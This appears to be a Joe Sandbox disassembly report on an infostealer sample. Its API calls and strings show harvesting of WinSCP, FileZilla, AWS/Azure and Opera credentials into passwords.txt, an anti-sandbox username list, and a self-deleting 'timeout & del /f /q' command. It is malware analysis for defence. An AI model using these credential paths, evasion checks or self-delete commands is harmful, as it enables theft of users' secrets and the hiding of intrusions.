Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

Function 0040E186 Relevance: 44.1, APIs: 11, Strings: 14, Instructions: 325registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040E1B7
_memset.LIBCMT ref: 0040E1D7
_memset.LIBCMT ref: 0040E1E8
_memset.LIBCMT ref: 0040E1F9
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
RegGetValueA.ADVAPI32(?,?,HostName,?,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9

Strings

Password: , xrefs: 0040E529
HostName, xrefs: 0040E367
passwords.txt, xrefs: 0040E662
Password, xrefs: 0040E515
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
Soft: WinSCP, xrefs: 0040E2FE
Host: , xrefs: 0040E32A
PortNumber, xrefs: 0040E3BD
UserName, xrefs: 0040E496
UseMasterPassword, xrefs: 0040E24E
:22, xrefs: 0040E42D
Login: , xrefs: 0040E459
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040E2B3
Security, xrefs: 0040E253

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 2191171593-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 0040DCA0 Relevance: 42.4, APIs: 28, Instructions: 399memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD

HeapFree.KERNEL32(00000000), ref: 0040DD27
strcpy_s.MSVCRT ref: 0040DD43
HeapFree.KERNEL32(00000000), ref: 0040DD62
HeapFree.KERNEL32(00000000), ref: 0040DD9A
HeapFree.KERNEL32(00000000), ref: 0040DDC4
strcpy_s.MSVCRT ref: 0040DDDA
HeapFree.KERNEL32(00000000), ref: 0040DDF3
HeapFree.KERNEL32(00000000), ref: 0040DE18
HeapFree.KERNEL32(00000000), ref: 0040DE42
strcpy_s.MSVCRT ref: 0040DE52
HeapFree.KERNEL32(00000000), ref: 0040DE6B
HeapFree.KERNEL32(00000000), ref: 0040DE9A
HeapFree.KERNEL32(00000000), ref: 0040DECA
strcpy_s.MSVCRT ref: 0040DEDD
HeapFree.KERNEL32(00000000), ref: 0040DEF6
lstrlenA.KERNEL32(00000000), ref: 0040DEFF
lstrlenA.KERNEL32(00000000), ref: 0040DF34

Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E

strcpy_s.MSVCRT ref: 0040DF75
HeapFree.KERNEL32(00000000), ref: 0040DFA8
lstrlenA.KERNEL32(?), ref: 0040DFAD
HeapFree.KERNEL32(00000000), ref: 0040DFDE
strcpy_s.MSVCRT ref: 0040DFEC
HeapFree.KERNEL32(00000000), ref: 0040E000
HeapFree.KERNEL32(00000000), ref: 0040E03C
strcpy_s.MSVCRT ref: 0040E065
HeapFree.KERNEL32(00000000), ref: 0040E07E
HeapFree.KERNEL32(00000000), ref: 0040E129
HeapFree.KERNEL32(00000000), ref: 0040E17A

Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
Part of subcall function 0040DB7F: strcpy_s.MSVCRT ref: 0040DC6F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeHeap$strcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
String ID:
API String ID: 219400098-0
Opcode ID: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction ID: 0a8d11442738e0aebf2a58bd4f58ea1ebce0464b8d6fd0751a66cb0fe0de1c79
Opcode Fuzzy Hash: 2561c5df908cdd488d2aa22bbe433537ad81f979b143cb002045d8ef8f0c2ae7
Instruction Fuzzy Hash: F0E14C72C00219ABEF249FF1DC48ADEBF79BF08305F1454AAF115B3152EA3A59849F54

Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
__mtterm.LIBCMT ref: 00424B2B

Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
TlsAlloc.KERNEL32 ref: 00424BB8
TlsSetValue.KERNEL32(00000000), ref: 00424BD3
__init_pointers.LIBCMT ref: 00424BDD
EncodePointer.KERNEL32 ref: 00424BEE
EncodePointer.KERNEL32 ref: 00424BFB
EncodePointer.KERNEL32 ref: 00424C08
EncodePointer.KERNEL32 ref: 00424C15
DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
__calloc_crt.LIBCMT ref: 00424C4B
DecodePointer.KERNEL32(00000000), ref: 00424C65
__initptd.LIBCMT ref: 00424C70
GetCurrentThreadId.KERNEL32 ref: 00424C77

Strings

FlsSetValue, xrefs: 00424B50
KERNEL32.DLL, xrefs: 00424B1A
FlsAlloc, xrefs: 00424B3B
FlsFree, xrefs: 00424B5D
FlsGetValue, xrefs: 00424B43

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E

Strings

maltest, xrefs: 004019D7
test user, xrefs: 004019E1
John Doe, xrefs: 004019F5
Miller, xrefs: 00401991
Peter Wilson, xrefs: 004019A5
CurrentUser, xrefs: 0040194B
Hong Lee, xrefs: 00401973
malware, xrefs: 004019CD
timmy, xrefs: 004019AF
sandbox, xrefs: 004019C3
IT-ADMIN, xrefs: 0040197D
user, xrefs: 004019B9
virus, xrefs: 004019EB
milozs, xrefs: 0040199B
Emily, xrefs: 0040195F
HAPUBWS, xrefs: 00401969
WDAGUtilityAccount, xrefs: 004019FF
Johnson, xrefs: 00401987
Sand box, xrefs: 00401955

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041B8FB

Strings

.tgz, xrefs: 0041B8F5
.zip, xrefs: 0041B8AD
.arj, xrefs: 0041B8DD
.gz, xrefs: 0041B8E9
.zoo, xrefs: 0041B8B9
.lzh, xrefs: 0041B8D1
.arc, xrefs: 0041B8C5

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 004164BD Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 114COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2
_memset.LIBCMT ref: 00416556
_memset.LIBCMT ref: 004165CA
_memset.LIBCMT ref: 0041663E

Strings

Azure\.IdentityService, xrefs: 00416619
Azure\.azure, xrefs: 00416531
Azure\.aws, xrefs: 004165A5
\.IdentityService\, xrefs: 004165FD
\.aws\, xrefs: 00416589
*.*, xrefs: 00416536
msal.cache, xrefs: 0041661E
\.azure\, xrefs: 00416512
*.*, xrefs: 004165AA

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2102423945-974132213
Opcode ID: 55a8d500616c789d0e657dfe8fa0d9e64425d0658c5e4b9ff82fff88e05ca36e
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 55a8d500616c789d0e657dfe8fa0d9e64425d0658c5e4b9ff82fff88e05ca36e
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 00414CC8 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 297stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00414D4F
_memset.LIBCMT ref: 00414D60
_memset.LIBCMT ref: 00414E28
strtok_s.MSVCRT ref: 00414E82
_memset.LIBCMT ref: 00414E94
strtok_s.MSVCRT ref: 00414EC2
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
strtok_s.MSVCRT ref: 00414FE7

Strings

%s\%s, xrefs: 00414DBC
%s\*.*, xrefs: 00414D10
%s\%s\%s, xrefs: 00414DF9
%s\%s, xrefs: 00414E10

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$strtok_s$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 2378718607-332874205
Opcode ID: 7048d79631d77e3b69450ef63e4f860a89950651d43e4fedf806bfe48cd23ff3
Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
Opcode Fuzzy Hash: 7048d79631d77e3b69450ef63e4f860a89950651d43e4fedf806bfe48cd23ff3
Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

Function 0040E6CF Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 289stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

Login: , xrefs: 0040E98C
<Port>, xrefs: 0040E818
<User>, xrefs: 0040E851
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Password: , xrefs: 0040E9AE
<Pass encoding="base64">, xrefs: 0040E88A
passwords.txt, xrefs: 0040EA4D
Soft: FileZilla, xrefs: 0040E948
Host: , xrefs: 0040E954
<Host>, xrefs: 0040E7D9

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocCreateLocalObjectSingleThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 216677008-935134978
Opcode ID: 9d14ff962cbfa92ac596727b9be21d1dd0c5f20fa87d44550d8f4e7319faeed8
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: 9d14ff962cbfa92ac596727b9be21d1dd0c5f20fa87d44550d8f4e7319faeed8
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00428B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428B2D

Part of subcall function 00424074: Sleep.KERNEL32(00000000,?), ref: 0042409C

__calloc_crt.LIBCMT ref: 00428B51
_free.LIBCMT ref: 00428B5F
__calloc_crt.LIBCMT ref: 00428B6D
_free.LIBCMT ref: 00428B7D
_free.LIBCMT ref: 00428B83
__copytlocinfo_nolock.LIBCMT ref: 00428B92
__setlocale_nolock.LIBCMT ref: 00428B9F
_free.LIBCMT ref: 00428BB8
__setmbcp_nolock.LIBCMT ref: 00428BCA
_free.LIBCMT ref: 00428BD8
_free.LIBCMT ref: 00428BEC

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction ID: 316f7d86b509052675ed64499f597221969422cd52b172cd7ffbd25416df4cfd
Opcode Fuzzy Hash: 682c6ff0facc8d8a86d528fa85871ae3cb6abaa4633ee56d462f9da954832b5c
Instruction Fuzzy Hash: 392126B1705621BADB217F26F802D4FBBE0DF91758BA0842FF48446261DF39A840C65D

Function 004015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 004015C6
Part of subcall function 004015BC: HeapAlloc.KERNEL32(00000000), ref: 004015CD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00401606
GetLastError.KERNEL32 ref: 0040160C
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00401614
GetWindowContextHelpId.USER32(00000000), ref: 0040161B
GetWindowLongW.USER32(00000000,00000000), ref: 00401623
RegisterClassW.USER32(00000000), ref: 0040162A
IsWindowVisible.USER32(00000000), ref: 00401631
ConvertDefaultLocale.KERNEL32(00000000), ref: 00401638
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401644
IsDialogMessageW.USER32(00000000,00000000), ref: 0040164C
GetProcessHeap.KERNEL32(00000000,?), ref: 00401656
HeapFree.KERNEL32(00000000), ref: 0040165D

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 0042660D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426634
_free.LIBCMT ref: 00426642
_free.LIBCMT ref: 0042664D
_free.LIBCMT ref: 00426621

Part of subcall function 0041D93B: HeapFree.KERNEL32(00000000,00000000,?,0041D18F,00000000,0043B6F4,0041D1D6,0040EEBE,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4), ref: 0041D951
Part of subcall function 0041D93B: GetLastError.KERNEL32(?,?,?,0041D2C0,0043B6F4,?,?,0042EC38,0043B6F4,?,?,?), ref: 0041D963

___free_lc_time.LIBCMT ref: 0042666B
_free.LIBCMT ref: 00426676
_free.LIBCMT ref: 0042669B
_free.LIBCMT ref: 004266B2
_free.LIBCMT ref: 004266C1

Strings

xLC, xrefs: 0042665B

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction ID: fdfe39178027f3e5e6c57af64549801535ecf2e9aa55874642047572a4db4e51
Opcode Fuzzy Hash: 330362af81a2d29c8bc6dd115f1b5d8232e71c49360d0d8446d85f6bf0e0d0e7
Instruction Fuzzy Hash: 421194F2A10311ABDF206F76E985B9BB3A5EB01308F95093FE14897251CB3C9C91CA1C

Function 0041B991 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041B9C5
GetFileSize.KERNEL32(?,00000000), ref: 0041BA3E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BA5A
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041BA6E
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BA77
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BA87
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BAA5
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BAB5

Strings

, xrefs: 0041BA11

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction ID: 2f96ef8e8c352da0c6fd23b8bc0b50d76e073618b9a0ce70252d9e73764e8c17
Opcode Fuzzy Hash: 18d893e6ac417df2152bfb73955086a669b690a37f7863a838ba57e2025041df
Instruction Fuzzy Hash: 4A51F3B1D0021CAFDB28DF99DC85AEEBBB9EF04344F10442AE511E6260D7789D85CF94

Function 00418271 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477

Strings

" & exit, xrefs: 004183DA
/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & rd /s /q "C:\ProgramData\, xrefs: 00418333
" & exit, xrefs: 00418389
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2102423945-1079830800
Opcode ID: d46c157a4d5234649ccbc3398d9aa7e4c0f9eceea218cecf25975c6506891a1a
Instruction ID: 1ae59a344acfb3974a61857d13031c8d3ca99e2a3e4d1f1889283d5f7c2ecc01
Opcode Fuzzy Hash: d46c157a4d5234649ccbc3398d9aa7e4c0f9eceea218cecf25975c6506891a1a
Instruction Fuzzy Hash: 7551BDB1E402299BCF21EF25DD456DDB3BCAB44708F4104EAA718B3151DB786FC68E58

Function 0041F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041F969

Part of subcall function 0041F504: Replicator::operator[].LIBCMT ref: 0041F587
Part of subcall function 0041F504: DName::operator+=.LIBCMT ref: 0041F58F

DName::operator+.LIBCMT ref: 0041F9C2
DName::DName.LIBCMT ref: 0041FA1A

Strings

,..., xrefs: 0041F9AE, 0041F9BA
<ellipsis>, xrefs: 0041FA04
,<ellipsis>, xrefs: 0041F9B5
void, xrefs: 0041FA12
..., xrefs: 0041F9FD, 0041FA09

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48

Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 004212E7
DName::DName.LIBCMT ref: 004212F3

Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF

UnDecorator::getScopedName.LIBCMT ref: 00421332
DName::operator+=.LIBCMT ref: 0042133C
DName::operator+=.LIBCMT ref: 0042134B
DName::operator+=.LIBCMT ref: 00421357
DName::operator+=.LIBCMT ref: 00421364

Strings

void, xrefs: 00421343

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748

Function 0040BF4D Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 420COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera GX, xrefs: 0040C091
Opera, xrefs: 0040C083
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 0-1710495004
Opcode ID: 0395fb4dbaf7060479cd39e257e6a94a206c6f9b995784019cb33d1d46c9cdf4
Instruction ID: c4b769843fd96ba5a9993bec0907288b27e6520762e28c1f4f52d27b6ca0eed4
Opcode Fuzzy Hash: 0395fb4dbaf7060479cd39e257e6a94a206c6f9b995784019cb33d1d46c9cdf4
Instruction Fuzzy Hash: 0E021D71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3191DBB86FC98F88

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

